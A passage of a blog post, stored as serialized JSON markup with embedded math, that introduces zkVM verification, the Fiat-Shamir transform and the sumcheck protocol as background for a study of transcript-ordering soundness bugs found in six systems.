that:",{"type":28,"tag":29,"props":107714,"children":107715},{},[107716],{"type":28,"tag":98,"props":107717,"children":107719},{"className":107718},[3652,3653],[107720],{"type":28,"tag":116,"props":107721,"children":107723},{"className":107722},[3658],[107724],{"type":28,"tag":116,"props":107725,"children":107727},{"className":107726,"ariaHidden":3664},[3663],[107728,107772,107847],{"type":28,"tag":116,"props":107729,"children":107731},{"className":107730},[3669],[107732,107736,107742,107746,107751,107755,107759,107764,107768],{"type":28,"tag":116,"props":107733,"children":107735},{"className":107734,"style":92578},[3674],[],{"type":28,"tag":116,"props":107737,"children":107739},{"className":107738},[3680],[107740],{"type":33,"value":107741},"∃",{"type":28,"tag":116,"props":107743,"children":107745},{"className":107744,"style":3857},[3759],[],{"type":28,"tag":116,"props":107747,"children":107749},{"className":107748,"style":21252},[3680,21251],[107750],{"type":33,"value":5659},{"type":28,"tag":116,"props":107752,"children":107754},{"className":107753,"style":3857},[3759],[],{"type":28,"tag":116,"props":107756,"children":107758},{"className":107757,"style":3857},[3759],[],{"type":28,"tag":116,"props":107760,"children":107762},{"className":107761},[3862],[107763],{"type":33,"value":4160},{"type":28,"tag":116,"props":107765,"children":107767},{"className":107766,"style":3857},[3759],[],{"type":28,"tag":116,"props":107769,"children":107771},{"className":107770,"style":3857},[3759],[],{"type":28,"tag":116,"props":107773,"children":107775},{"className":107774},[3669],[107776,107780,107791,107796,107801,107806,107810,107815,107820,107824,107829,107834,107838,107843],{"type":28,"tag":116,"props":107777,"children":107779},{"className":107778,"style":3780},[3674],[],{"type":28,"tag":116,"props":107781,"children":107783},{"className":107782},[3680],[107784],{"type":28,"tag":116,"props":107785,"children":107788},{"className":107786},[3680,107787],"mathsf",[107789],{"type":33,"value":107790},"VM",{"type":28,"tag":116,"props":107792,"children":107794},{"className":107793},[21380],[107795],{"type":33,"value":313},{"type":28,"tag":116,"props":107797,"children":107799},{"className":107798,"style":21252},[3680,21251],[107800],{"type":33,"value":21255},{"type":28,"tag":116,"props":107802,"children":107804},{"className":107803},[3791],[107805],{"type":33,"value":3794},{"type":28,"tag":116,"props":107807,"children":107809},{"className":107808,"style":3798},[3759],[],{"type":28,"tag":116,"props":107811,"children":107813},{"className":107812,"style":94683},[3680,21251],[107814],{"type":33,"value":5804},{"type":28,"tag":116,"props":107816,"children":107818},{"className":107817},[3791],[107819],{"type":33,"value":3794},{"type":28,"tag":116,"props":107821,"children":107823},{"className":107822,"style":3798},[3759],[],{"type":28,"tag":116,"props":107825,"children":107827},{"className":107826,"style":21252},[3680,21251],[107828],{"type":33,"value":5659},{"type":28,"tag":116,"props":107830,"children":107832},{"className":107831},[21401],[107833],{"type":33,"value":1829},{"type":28,"tag":116,"props":107835,"children":107837},{"className":107836,"style":3857},[3759],[],{"type":28,"tag":116,"props":107839,"children":107841},{"className":107840},[3862],[107842],{"type":33,"value":21996},{"type":28,"tag":116,"props":107844,"children":107846},{"className":107845,"style":3857},[3759],[],{"type":28,"tag":116,"props":107848,"children":107850},{"className":107849},[3669],[107851,107855],{"type":28,"tag":116,"props":107852,"children":107854},{"className":107853,"style":21246},[3674],[],{"type":28,"tag":116,"props":107856,"children":107859},{"className":107857,"style":107858},[3680,21251],"margin-right:0.22222em;",[107860],{"type":33,"value":5834},{"type":28,"tag":29,"props":107862,"children":107863},{},[107864],{"type":33,"value":107865},"where:",{"type":28,"tag":2108,"props":107867,"children":107868},{},[107869,107899,107929,107959],{"type":28,"tag":459,"props":107870,"children":107871},{},[107872,107897],{"type":28,"tag":98,"props":107873,"children":107875},{"className":107874},[3652,3653],[107876],{"type":28,"tag":116,"props":107877,"children":107879},{"className":107878},[3658],[107880],{"type":28,"tag":116,"props":107881,"children":107883},{"className":107882,"ariaHidden":3664},[3663],[107884],{"type":28,"tag":116,"props":107885,"children":107887},{"className":107886},[3669],[107888,107892],{"type":28,"tag":116,"props":107889,"children":107891},{"className":107890,"style":21246},[3674],[],{"type":28,"tag":116,"props":107893,"children":107895},{"className":107894,"style":21252},[3680,21251],[107896],{"type":33,"value":21255},{"type":33,"value":107898}," = program/circuit description (public)",{"type":28,"tag":459,"props":107900,"children":107901},{},[107902,107927],{"type":28,"tag":98,"props":107903,"children":107905},{"className":107904},[3652,3653],[107906],{"type":28,"tag":116,"props":107907,"children":107909},{"className":107908},[3658],[107910],{"type":28,"tag":116,"props":107911,"children":107913},{"className":107912,"ariaHidden":3664},[3663],[107914],{"type":28,"tag":116,"props":107915,"children":107917},{"className":107916},[3669],[107918,107922],{"type":28,"tag":116,"props":107919,"children":107921},{"className":107920,"style":21246},[3674],[],{"type":28,"tag":116,"props":107923,"children":107925},{"className":107924,"style":94683},[3680,21251],[107926],{"type":33,"value":5804},{"type":33,"value":107928}," = public input",{"type":28,"tag":459,"props":107930,"children":107931},{},[107932,107957],{"type":28,"tag":98,"props":107933,"children":107935},{"className":107934},[3652,3653],[107936],{"type":28,"tag":116,"props":107937,"children":107939},{"className":107938},[3658],[107940],{"type":28,"tag":116,"props":107941,"children":107943},{"className":107942,"ariaHidden":3664},[3663],[107944],{"type":28,"tag":116,"props":107945,"children":107947},{"className":107946},[3669],[107948,107952],{"type":28,"tag":116,"props":107949,"children":107951},{"className":107950,"style":21246},[3674],[],{"type":28,"tag":116,"props":107953,"children":107955},{"className":107954,"style":107858},[3680,21251],[107956],{"type":33,"value":5834},{"type":33,"value":107958}," = claimed public output",{"type":28,"tag":459,"props":107960,"children":107961},{},[107962,107987],{"type":28,"tag":98,"props":107963,"children":107965},{"className":107964},[3652,3653],[107966],{"type":28,"tag":116,"props":107967,"children":107969},{"className":107968},[3658],[107970],{"type":28,"tag":116,"props":107971,"children":107973},{"className":107972,"ariaHidden":3664},[3663],[107974],{"type":28,"tag":116,"props":107975,"children":107977},{"className":107976},[3669],[107978,107982],{"type":28,"tag":116,"props":107979,"children":107981},{"className":107980,"style":21246},[3674],[],{"type":28,"tag":116,"props":107983,"children":107985},{"className":107984,"style":21252},[3680,21251],[107986],{"type":33,"value":5659},{"type":33,"value":107988}," = private witness/trace (registers, memory history, intermediate values)",{"type":28,"tag":29,"props":107990,"children":107991},{},[107992,107994,107998],{"type":33,"value":107993},"The verifier does ",{"type":28,"tag":4995,"props":107995,"children":107996},{},[107997],{"type":33,"value":18152},{"type":33,"value":107999}," replay execution step by step. Instead, it checks algebraic constraints over committed polynomials.",{"type":28,"tag":29,"props":108001,"children":108002},{},[108003,108005,108010],{"type":33,"value":108004},"Some systems in this post are verifiable-computing systems rather than full zero-knowledge systems, but the critical property is still ",{"type":28,"tag":4995,"props":108006,"children":108007},{},[108008],{"type":33,"value":108009},"soundness",{"type":33,"value":4160},{"type":28,"tag":2108,"props":108012,"children":108013},{},[108014,108024],{"type":28,"tag":459,"props":108015,"children":108016},{},[108017,108022],{"type":28,"tag":4995,"props":108018,"children":108019},{},[108020],{"type":33,"value":108021},"Completeness",{"type":33,"value":108023},": honest execution verifies.",{"type":28,"tag":459,"props":108025,"children":108026},{},[108027,108032],{"type":28,"tag":4995,"props":108028,"children":108029},{},[108030],{"type":33,"value":108031},"Soundness",{"type":33,"value":108033},": false execution should not verify.",{"type":28,"tag":29,"props":108035,"children":108036},{},[108037,108039,108043],{"type":33,"value":108038},"We are breaking ",{"type":28,"tag":4995,"props":108040,"children":108041},{},[108042],{"type":33,"value":108009},{"type":33,"value":108044}," in all six systems.",{"type":28,"tag":29,"props":108046,"children":108047},{},[108048],{"type":33,"value":108049},"In all six codebases, verification follows this abstract flow:",{"type":28,"tag":455,"props":108051,"children":108052},{},[108053,108058,108063,108068,108073,108078],{"type":28,"tag":459,"props":108054,"children":108055},{},[108056],{"type":33,"value":108057},"Fix public statement data.",{"type":28,"tag":459,"props":108059,"children":108060},{},[108061],{"type":33,"value":108062},"Parse proof payload (commitments, reduction messages, openings).",{"type":28,"tag":459,"props":108064,"children":108065},{},[108066],{"type":33,"value":108067},"Rebuild Fiat-Shamir challenges from transcript state.",{"type":28,"tag":459,"props":108069,"children":108070},{},[108071],{"type":33,"value":108072},"Check constraint equations at sampled points.",{"type":28,"tag":459,"props":108074,"children":108075},{},[108076],{"type":33,"value":108077},"Check PCS/opening consistency.",{"type":28,"tag":459,"props":108079,"children":108080},{},[108081],{"type":33,"value":108082},"Accept only if all checks are jointly consistent.",{"type":28,"tag":29,"props":108084,"children":108085},{},[108086],{"type":28,"tag":206,"props":108087,"children":108090},{"alt":108088,"src":108089},"1_prover_verifier","/posts/zkvms-unfaithful-claims/1_prover_verifier.svg",[],{"type":28,"tag":29,"props":108092,"children":108093},{},[108094],{"type":33,"value":108095},"The non-negotiable invariant is transcript ordering: if a value affects a verifier equation, it must be absorbed before sampling the challenge that gates that equation. Violating this gives the prover an attacker-controlled degree of freedom.",{"type":28,"tag":18457,"props":108097,"children":108098},{},[],{"type":28,"tag":63,"props":108100,"children":108102},{"id":108101},"the-building-blocks",[108103],{"type":33,"value":108104},"The Building Blocks",{"type":28,"tag":29,"props":108106,"children":108107},{},[108108],{"type":33,"value":108109},"Before we can understand the bugs, we need to understand the protocols they break. Each of these is a tool that zkVMs compose together.",{"type":28,"tag":75,"props":108111,"children":108113},{"id":108112},"the-fiat-shamir-transform",[108114],{"type":33,"value":108115},"The Fiat-Shamir Transform",{"type":28,"tag":29,"props":108117,"children":108118},{},[108119],{"type":33,"value":108120},"Interactive protocols (the type most commonly described in literature) require real-time communication. It involves the verifier sending random challenges, and the prover responding to them. This doesn't work for blockchains (where you have no real-time verifier) or when you want anyone to verify your proof at a later point.",{"type":28,"tag":29,"props":108122,"children":108123},{},[108124],{"type":33,"value":108125},"The solution is to replace the verifier's randomness with a hash function. The prover \"talks to themselves,\" using the hash of everything so far as the challenge. If we use a cryptographic hash function, this should mean that the challenges are completely unpredictable.",{"type":28,"tag":29,"props":108127,"children":108128},{},[108129],{"type":28,"tag":206,"props":108130,"children":108133},{"alt":108131,"src":108132},"fiat_shamir2","/posts/zkvms-unfaithful-claims/fiat_shamir2.svg",[],{"type":28,"tag":29,"props":108135,"children":108136},{},[108137,108139,108143,108145,108150],{"type":33,"value":108138},"The hash (transcript) ",{"type":28,"tag":4995,"props":108140,"children":108141},{},[108142],{"type":33,"value":6191},{"type":33,"value":108144}," include everything that affects verification ",{"type":28,"tag":4995,"props":108146,"children":108147},{},[108148],{"type":33,"value":108149},"BEFORE",{"type":33,"value":108151}," the challenges derived from it are used.",{"type":28,"tag":29,"props":108153,"children":108154},{},[108155,108157,108183,108185,108210,108212,108237,108239,108264,108266,108291],{"type":33,"value":108156},"If some value ",{"type":28,"tag":98,"props":108158,"children":108160},{"className":108159},[3652,3653],[108161],{"type":28,"tag":116,"props":108162,"children":108164},{"className":108163},[3658],[108165],{"type":28,"tag":116,"props":108166,"children":108168},{"className":108167,"ariaHidden":3664},[3663],[108169],{"type":28,"tag":116,"props":108170,"children":108172},{"className":108171},[3669],[108173,108177],{"type":28,"tag":116,"props":108174,"children":108176},{"className":108175,"style":21246},[3674],[],{"type":28,"tag":116,"props":108178,"children":108180},{"className":108179,"style":107858},[3680,21251],[108181],{"type":33,"value":108182},"V",{"type":33,"value":108184}," affects a verification equation, but ",{"type":28,"tag":98,"props":108186,"children":108188},{"className":108187},[3652,3653],[108189],{"type":28,"tag":116,"props":108190,"children":108192},{"className":108191},[3658],[108193],{"type":28,"tag":116,"props":108194,"children":108196},{"className":108195,"ariaHidden":3664},[3663],[108197],{"type":28,"tag":116,"props":108198,"children":108200},{"className":108199},[3669],[108201,108205],{"type":28,"tag":116,"props":108202,"children":108204},{"className":108203,"style":21246},[3674],[],{"type":28,"tag":116,"props":108206,"children":108208},{"className":108207,"style":107858},[3680,21251],[108209],{"type":33,"value":108182},{"type":33,"value":108211}," isn't absorbed before the relevant challenge is squeezed, then the challenge is completely independent of ",{"type":28,"tag":98,"props":108213,"children":108215},{"className":108214},[3652,3653],[108216],{"type":28,"tag":116,"props":108217,"children":108219},{"className":108218},[3658],[108220],{"type":28,"tag":116,"props":108221,"children":108223},{"className":108222,"ariaHidden":3664},[3663],[108224],{"type":28,"tag":116,"props":108225,"children":108227},{"className":108226},[3669],[108228,108232],{"type":28,"tag":116,"props":108229,"children":108231},{"className":108230,"style":21246},[3674],[],{"type":28,"tag":116,"props":108233,"children":108235},{"className":108234,"style":107858},[3680,21251],[108236],{"type":33,"value":108182},{"type":33,"value":108238},". This means that the prover can \"see\" (compute in advance) the challenge before choosing ",{"type":28,"tag":98,"props":108240,"children":108242},{"className":108241},[3652,3653],[108243],{"type":28,"tag":116,"props":108244,"children":108246},{"className":108245},[3658],[108247],{"type":28,"tag":116,"props":108248,"children":108250},{"className":108249,"ariaHidden":3664},[3663],[108251],{"type":28,"tag":116,"props":108252,"children":108254},{"className":108253},[3669],[108255,108259],{"type":28,"tag":116,"props":108256,"children":108258},{"className":108257,"style":21246},[3674],[],{"type":28,"tag":116,"props":108260,"children":108262},{"className":108261,"style":107858},[3680,21251],[108263],{"type":33,"value":108182},{"type":33,"value":108265},", which may allow it to choose ",{"type":28,"tag":98,"props":108267,"children":108269},{"className":108268},[3652,3653],[108270],{"type":28,"tag":116,"props":108271,"children":108273},{"className":108272},[3658],[108274],{"type":28,"tag":116,"props":108275,"children":108277},{"className":108276,"ariaHidden":3664},[3663],[108278],{"type":28,"tag":116,"props":108279,"children":108281},{"className":108280},[3669],[108282,108286],{"type":28,"tag":116,"props":108283,"children":108285},{"className":108284,"style":21246},[3674],[],{"type":28,"tag":116,"props":108287,"children":108289},{"className":108288,"style":107858},[3680,21251],[108290],{"type":33,"value":108182},{"type":33,"value":108292}," exactly so that the verification passes, even though it should not.",{"type":28,"tag":29,"props":108294,"children":108295},{},[108296],{"type":33,"value":108297},"This is the bug class we found in all six systems.",{"type":28,"tag":75,"props":108299,"children":108301},{"id":108300},"the-sumcheck-protocol",[108302],{"type":33,"value":108303},"The Sumcheck Protocol",{"type":28,"tag":29,"props":108305,"children":108306},{},[108307,108309,108395],{"type":33,"value":108308},"The sumcheck protocol proves that a polynomial sums to a claimed value over the Boolean hypercube (all inputs in ",{"type":28,"tag":98,"props":108310,"children":108312},{"className":108311},[3652,3653],[108313],{"type":28,"tag":116,"props":108314,"children":108316},{"className":108315},[3658],[108317],{"type":28,"tag":116,"props":108318,"children":108320},{"className":108319,"ariaHidden":3664},[3663],[108321],{"type":28,"tag":116,"props":108322,"children":108324},{"className":108323},[3669],[108325,108329,108334,108339,108344,108348,108353],{"type":28,"tag":116,"props":108326,"children":108328},{"className":108327,"style":3780},[3674],[],{"type":28,"tag":116,"props":108330,"children":108332},{"className":108331},[21380],[108333],{"type":33,"value":76238},{"type":28,"tag":116,"props":108335,"children":108337},{"className":108336},[3680],[108338],{"type":33,"value":353},{"type":28,"tag":116,"props":108340,"children":108342},{"className":108341},[3791],[108343],{"type":33,"value":3794},{"type":28,"tag":116,"props":108345,"children":108347},{"className":108346,"style":3798},[3759],[],{"type":28,"tag":116,"props":108349,"children":108351},{"className":108350},[3680],[108352],{"type":33,"value":1824},{"type":28,"tag":116,"props":108354,"children":108356},{"className":108355},[21401],[108357,108362],{"type":28,"tag":116,"props":108358,"children":108360},{"className":108359},[21401],[108361],{"type":33,"value":885},{"type":28,"tag":116,"props":108363,"children":108365},{"className":108364},[3695],[108366],{"type":28,"tag":116,"props":108367,"children":108369},{"className":108368},[3700],[108370],{"type":28,"tag":116,"props":108371,"children":108373},{"className":108372},[3705],[108374],{"type":28,"tag":116,"props":108375,"children":108378},{"className":108376,"style":108377},[3710],"height:0.6644em;",[108379],{"type":28,"tag":116,"props":108380,"children":108381},{"style":3714},[108382,108386],{"type":28,"tag":116,"props":108383,"children":108385},{"className":108384,"style":3720},[3719],[],{"type":28,"tag":116,"props":108387,"children":108389},{"className":108388},[3725,3726,3727,3728],[108390],{"type":28,"tag":116,"props":108391,"children":108393},{"className":108392},[3680,21251,3728],[108394],{"type":33,"value":56022},{"type":33,"value":108396},"), i.e the claim:",{"type":28,"tag":29,"props":108398,"children":108399},{},[108400],{"type":28,"tag":98,"props":108401,"children":108403},{"className":108402},[3652,3653],[108404],{"type":28,"tag":116,"props":108405,"children":108407},{"className":108406},[3658],[108408],{"type":28,"tag":116,"props":108409,"children":108411},{"className":108410,"ariaHidden":3664},[3663],[108412,108438],{"type":28,"tag":116,"props":108413,"children":108415},{"className":108414},[3669],[108416,108420,108425,108429,108434],{"type":28,"tag":116,"props":108417,"children":108419},{"className":108418,"style":21246},[3674],[],{"type":28,"tag":116,"props":108421,"children":108423},{"className":108422,"style":92897},[3680,21251],[108424],{"type":33,"value":92900},{"type":28,"tag":116,"props":108426,"children":108428},{"className":108427,"style":3857},[3759],[],{"type":28,"tag":116,"props":108430,"children":108432},{"className":108431},[3862],[108433],{"type":33,"value":373},{"type":28,"tag":116,"props":108435,"children":108437},{"className":108436,"style":3857},[3759],[],{"type":28,"tag":116,"props":108439,"children":108441},{"className":108440},[3669],[108442,108446,108596,108600,108743,108747,108754,108758,108902,108906,108912,108917,108974,108979,108983,109040,109045,109049,109055,109059,109064,109068,109126],{"type":28,"tag":116,"props":108443,"children":108445},{"className":108444,"style":21282},[3674],[],{"type":28,"tag":116,"props":108447,"children":108449},{"className":108448},[21287],[108450,108456],{"type":28,"tag":116,"props":108451,"children":108453},{"className":108452,"style":21294},[21287,21292,21293],[108454],{"type":33,"value":108455},"∑",{"type":28,"tag":116,"props":108457,"children":108459},{"className":108458},[3695],[108460],{"type":28,"tag":116,"props":108461,"children":108463},{"className":108462},[3700,21305],[108464,108585],{"type":28,"tag":116,"props":108465,"children":108467},{"className":108466},[3705],[108468,108580],{"type":28,"tag":116,"props":108469,"children":108471},{"className":108470,"style":21314},[3710],[108472],{"type":28,"tag":116,"props":108473,"children":108474},{"style":21318},[108475,108479],{"type":28,"tag":116,"props":108476,"children":108478},{"className":108477,"style":3720},[3719],[],{"type":28,"tag":116,"props":108480,"children":108482},{"className":108481},[3725,3726,3727,3728],[108483],{"type":28,"tag":116,"props":108484,"children":108486},{"className":108485},[3680,3728],[108487,108550,108555,108560,108565,108570,108575],{"type":28,"tag":116,"props":108488,"children":108490},{"className":108489},[3680,3728],[108491,108496],{"type":28,"tag":116,"props":108492,"children":108494},{"className":108493},[3680,21251,3728],[108495],{"type":33,"value":18939},{"type":28,"tag":116,"props":108497,"children":108499},{"className":108498},[3695],[108500],{"type":28,"tag":116,"props":108501,"children":108503},{"className":108502},[3700,21305],[108504,108538],{"type":28,"tag":116,"props":108505,"children":108507},{"className":108506},[3705],[108508,108533],{"type":28,"tag":116,"props":108509,"children":108512},{"className":108510,"style":108511},[3710],"height:0.3173em;",[108513],{"type":28,"tag":116,"props":108514,"children":108516},{"style":108515},"top:-2.357em;margin-left:0em;margin-right:0.0714em;",[108517,108522],{"type":28,"tag":116,"props":108518,"children":108521},{"className":108519,"style":108520},[3719],"height:2.5em;",[],{"type":28,"tag":116,"props":108523,"children":108527},{"className":108524},[3725,108525,108526,3728],"reset-size3","size1",[108528],{"type":28,"tag":116,"props":108529,"children":108531},{"className":108530},[3680,3728],[108532],{"type":33,"value":1824},{"type":28,"tag":116,"props":108534,"children":108536},{"className":108535},[21407],[108537],{"type":33,"value":21410},{"type":28,"tag":116,"props":108539,"children":108541},{"className":108540},[3705],[108542],{"type":28,"tag":116,"props":108543,"children":108546},{"className":108544,"style":108545},[3710],"height:0.143em;",[108547],{"type":28,"tag":116,"props":108548,"children":108549},{},[],{"type":28,"tag":116,"props":108551,"children":108553},{"className":108552},[3862,3728],[108554],{"type":33,"value":21358},{"type":28,"tag":116,"props":108556,"children":108558},{"className":108557},[21380,3728],[108559],{"type":33,"value":76238},{"type":28,"tag":116,"props":108561,"children":108563},{"className":108562},[3680,3728],[108564],{"type":33,"value":353},{"type":28,"tag":116,"props":108566,"children":108568},{"className":108567},[3791,3728],[108569],{"type":33,"value":3794},{"type":28,"tag":116,"props":108571,"children":108573},{"className":108572},[3680,3728],[108574],{"type":33,"value":1824},{"type":28,"tag":116,"props":108576,"children":108578},{"className":108577},[21401,3728],[108579],{"type":33,"value":885},{"type":28,"tag":116,"props":108581,"children":108583},{"className":108582},[21407],[108584],{"type":33,"value":21410},{"type":28,"tag":116,"props":108586,"children":108588},{"className":108587},[3705],[108589],{"type":28,"tag":116,"props":108590,"children":108592},{"className":108591,"style":21418},[3710],[108593],{"type":28,"tag":116,"props":108594,"children":108595},{},[],{"type":28,"tag":116,"props":108597,"children":108599},{"className":108598,"style":3798},[3759],[],{"type":28,"tag":116,"props":108601,"children":108603},{"className":108602},[21287],[108604,108609],{"type":28,"tag":116,"props":108605,"children":108607},{"className":108606,"style":21294},[21287,21292,21293],[108608],{"type":33,"value":108455},{"type":28,"tag":116,"props":108610,"children":108612},{"className":108611},[3695],[108613],{"type":28,"tag":116,"props":108614,"children":108616},{"className":108615},[3700,21305],[108617,108732],{"type":28,"tag":116,"props":108618,"children":108620},{"className":108619},[3705],[108621,108727],{"type":28,"tag":116,"props":108622,"children":108624},{"className":108623,"style":21314},[3710],[108625],{"type":28,"tag":116,"props":108626,"children":108627},{"style":21318},[108628,108632],{"type":28,"tag":116,"props":108629,"children":108631},{"className":108630,"style":3720},[3719],[],{"type":28,"tag":116,"props":108633,"children":108635},{"className":108634},[3725,3726,3727,3728],[108636],{"type":28,"tag":116,"props":108637,"children":108639},{"className":108638},[3680,3728],[108640,108697,108702,108707,108712,108717,108722],{"type":28,"tag":116,"props":108641,"children":108643},{"className":108642},[3680,3728],[108644,108649],{"type":28,"tag":116,"props":108645,"children":108647},{"className":108646},[3680,21251,3728],[108648],{"type":33,"value":18939},{"type":28,"tag":116,"props":108650,"children":108652},{"className":108651},[3695],[108653],{"type":28,"tag":116,"props":108654,"children":108656},{"className":108655},[3700,21305],[108657,108686],{"type":28,"tag":116,"props":108658,"children":108660},{"className":108659},[3705],[108661,108681],{"type":28,"tag":116,"props":108662,"children":108664},{"className":108663,"style":108511},[3710],[108665],{"type":28,"tag":116,"props":108666,"children":108667},{"style":108515},[108668,108672],{"type":28,"tag":116,"props":108669,"children":108671},{"className":108670,"style":108520},[3719],[],{"type":28,"tag":116,"props":108673,"children":108675},{"className":108674},[3725,108525,108526,3728],[108676],{"type":28,"tag":116,"props":108677,"children":108679},{"className":108678},[3680,3728],[108680],{"type":33,"value":2794},{"type":28,"tag":116,"props":108682,"children":108684},{"className":108683},[21407],[108685],{"type":33,"value":21410},{"type":28,"tag":116,"props":108687,"children":108689},{"className":108688},[3705],[108690],{"type":28,"tag":116,"props":108691,"children":108693},{"className":108692,"style":108545},[3710],[108694],{"type":28,"tag":116,"props":108695,"children":108696},{},[],{"type":28,"tag":116,"props":108698,"children":108700},{"className":108699},[3862,3728],[108701],{"type":33,"value":21358},{"type":28,"tag":116,"props":108703,"children":108705},{"className":108704},[21380,3728],[108706],{"type":33,"value":76238},{"type":28,"tag":116,"props":108708,"children":108710},{"className":108709},[3680,3728],[108711],{"type":33,"value":353},{"type":28,"tag":116,"props":108713,"children":108715},{"className":108714},[3791,3728],[108716],{"type":33,"value":3794},{"type":28,"tag":116,"props":108718,"children":108720},{"className":108719},[3680,3728],[108721],{"type":33,"value":1824},{"type":28,"tag":116,"props":108723,"children":108725},{"className":108724},[21401,3728],[108726],{"type":33,"value":885},{"type":28,"tag":116,"props":108728,"children":108730},{"className":108729},[21407],[108731],{"type":33,"value":21410},{"type":28,"tag":116,"props":108733,"children":108735},{"className":108734},[3705],[108736],{"type":28,"tag":116,"props":108737,"children":108739},{"className":108738,"style":21418},[3710],[108740],{"type":28,"tag":116,"props":108741,"children":108742},{},[],{"type":28,"tag":116,"props":108744,"children":108746},{"className":108745,"style":3798},[3759],[],{"type":28,"tag":116,"props":108748,"children":108751},{"className":108749},[108750],"minner",[108752],{"type":33,"value":108753},"⋯",{"type":28,"tag":116,"props":108755,"children":108757},{"className":108756,"style":3798},[3759],[],{"type":28,"tag":116,"props":108759,"children":108761},{"className":108760},[21287],[108762,108767],{"type":28,"tag":116,"props":108763,"children":108765},{"className":108764,"style":21294},[21287,21292,21293],[108766],{"type":33,"value":108455},{"type":28,"tag":116,"props":108768,"children":108770},{"className":108769},[3695],[108771],{"type":28,"tag":116,"props":108772,"children":108774},{"className":108773},[3700,21305],[108775,108891],{"type":28,"tag":116,"props":108776,"children":108778},{"className":108777},[3705],[108779,108886],{"type":28,"tag":116,"props":108780,"children":108782},{"className":108781,"style":21314},[3710],[108783],{"type":28,"tag":116,"props":108784,"children":108785},{"style":21318},[108786,108790],{"type":28,"tag":116,"props":108787,"children":108789},{"className":108788,"style":3720},[3719],[],{"type":28,"tag":116,"props":108791,"children":108793},{"className":108792},[3725,3726,3727,3728],[108794],{"type":28,"tag":116,"props":108795,"children":108797},{"className":108796},[3680,3728],[108798,108856,108861,108866,108871,108876,108881],{"type":28,"tag":116,"props":108799,"children":108801},{"className":108800},[3680,3728],[108802,108807],{"type":28,"tag":116,"props":108803,"children":108805},{"className":108804},[3680,21251,3728],[108806],{"type":33,"value":18939},{"type":28,"tag":116,"props":108808,"children":108810},{"className":108809},[3695],[108811],{"type":28,"tag":116,"props":108812,"children":108814},{"className":108813},[3700,21305],[108815,108845],{"type":28,"tag":116,"props":108816,"children":108818},{"className":108817},[3705],[108819,108840],{"type":28,"tag":116,"props":108820,"children":108823},{"className":108821,"style":108822},[3710],"height:0.1645em;",[108824],{"type":28,"tag":116,"props":108825,"children":108826},{"style":108515},[108827,108831],{"type":28,"tag":116,"props":108828,"children":108830},{"className":108829,"style":108520},[3719],[],{"type":28,"tag":116,"props":108832,"children":108834},{"className":108833},[3725,108525,108526,3728],[108835],{"type":28,"tag":116,"props":108836,"children":108838},{"className":108837},[3680,21251,3728],[108839],{"type":33,"value":56022},{"type":28,"tag":116,"props":108841,"children":108843},{"className":108842},[21407],[108844],{"type":33,"value":21410},{"type":28,"tag":116,"props":108846,"children":108848},{"className":108847},[3705],[108849],{"type":28,"tag":116,"props":108850,"children":108852},{"className":108851,"style":108545},[3710],[108853],{"type":28,"tag":116,"props":108854,"children":108855},{},[],{"type":28,"tag":116,"props":108857,"children":108859},{"className":108858},[3862,3728],[108860],{"type":33,"value":21358},{"type":28,"tag":116,"props":108862,"children":108864},{"className":108863},[21380,3728],[108865],{"type":33,"value":76238},{"type":28,"tag":116,"props":108867,"children":108869},{"className":108868},[3680,3728],[108870],{"type":33,"value":353},{"type":28,"tag":116,"props":108872,"children":108874},{"className":108873},[3791,3728],[108875],{"type":33,"value":3794},{"type":28,"tag":116,"props":108877,"children":108879},{"className":108878},[3680,3728],[108880],{"type":33,"value":1824},{"type":28,"tag":116,"props":108882,"children":108884},{"className":108883},[21401,3728],[108885],{"type":33,"value":885},{"type":28,"tag":116,"props":108887,"children":108889},{"className":108888},[21407],[108890],{"type":33,"value":21410},{"type":28,"tag":116,"props":108892,"children":108894},{"className":108893},[3705],[108895],{"type":28,"tag":116,"props":108896,"children":108898},{"className":108897,"style":21418},[3710],[108899],{"type":28,"tag":116,"props":108900,"children":108901},{},[],{"type":28,"tag":116,"props":108903,"children":108905},{"className":108904,"style":3798},[3759],[],{"type":28,"tag":116,"props":108907,"children":108909},{"className":108908,"style":93149},[3680,21251],[108910],{"type":33,"value":108911},"g",{"type":28,"tag":116,"props":108913,"children":108915},{"className":108914},[21380],[108916],{"type":33,"value":313},{"type":28,"tag":116,"props":108918,"children":108920},{"className":108919},[3680],[108921,108926],{"type":28,"tag":116,"props":108922,"children":108924},{"className":108923},[3680,21251],[108925],{"type":33,"value":18939},{"type":28,"tag":116,"props":108927,"children":108929},{"className":108928},[3695],[108930],{"type":28,"tag":116,"props":108931,"children":108933},{"className":108932},[3700,21305],[108934,108963],{"type":28,"tag":116,"props":108935,"children":108937},{"className":108936},[3705],[108938,108958],{"type":28,"tag":116,"props":108939,"children":108941},{"className":108940,"style":92715},[3710],[108942],{"type":28,"tag":116,"props":108943,"children":108944},{"style":92719},[108945,108949],{"type":28,"tag":116,"props":108946,"children":108948},{"className":108947,"style":3720},[3719],[],{"type":28,"tag":116,"props":108950,"children":108952},{"className":108951},[3725,3726,3727,3728],[108953],{"type":28,"tag":116,"props":108954,"children":108956},{"className":108955},[3680,3728],[108957],{"type":33,"value":1824},{"type":28,"tag":116,"props":108959,"children":108961},{"className":108960},[21407],[108962],{"type":33,"value":21410},{"type":28,"tag":116,"props":108964,"children":108966},{"className":108965},[3705],[108967],{"type":28,"tag":116,"props":108968,"children":108970},{"className":108969,"style":92746},[3710],[108971],{"type":28,"tag":116,"props":108972,"children":108973},{},[],{"type":28,"tag":116,"props":108975,"children":108977},{"className":108976},[3791],[108978],{"type":33,"value":3794},{"type":28,"tag":116,"props":108980,"children":108982},{"className":108981,"style":3798},[3759],[],{"type":28,"tag":116,"props":108984,"children":108986},{"className":108985},[3680],[108987,108992],{"type":28,"tag":116,"props":108988,"children":108990},{"className":108989},[3680,21251],[108991],{"type":33,"value":18939},{"type":28,"tag":116,"props":108993,"children":108995},{"className":108994},[3695],[108996],{"type":28,"tag":116,"props":108997,"children":108999},{"className":108998},[3700,21305],[109000,109029],{"type":28,"tag":116,"props":109001,"children":109003},{"className":109002},[3705],[109004,109024],{"type":28,"tag":116,"props":109005,"children":109007},{"className":109006,"style":92715},[3710],[109008],{"type":28,"tag":116,"props":109009,"children":109010},{"style":92719},[109011,109015],{"type":28,"tag":116,"props":109012,"children":109014},{"className":109013,"style":3720},[3719],[],{"type":28,"tag":116,"props":109016,"children":109018},{"className":109017},[3725,3726,3727,3728],[109019],{"type":28,"tag":116,"props":109020,"children":109022},{"className":109021},[3680,3728],[109023],{"type":33,"value":2794},{"type":28,"tag":116,"props":109025,"children":109027},{"className":109026},[21407],[109028],{"type":33,"value":21410},{"type":28,"tag":116,"p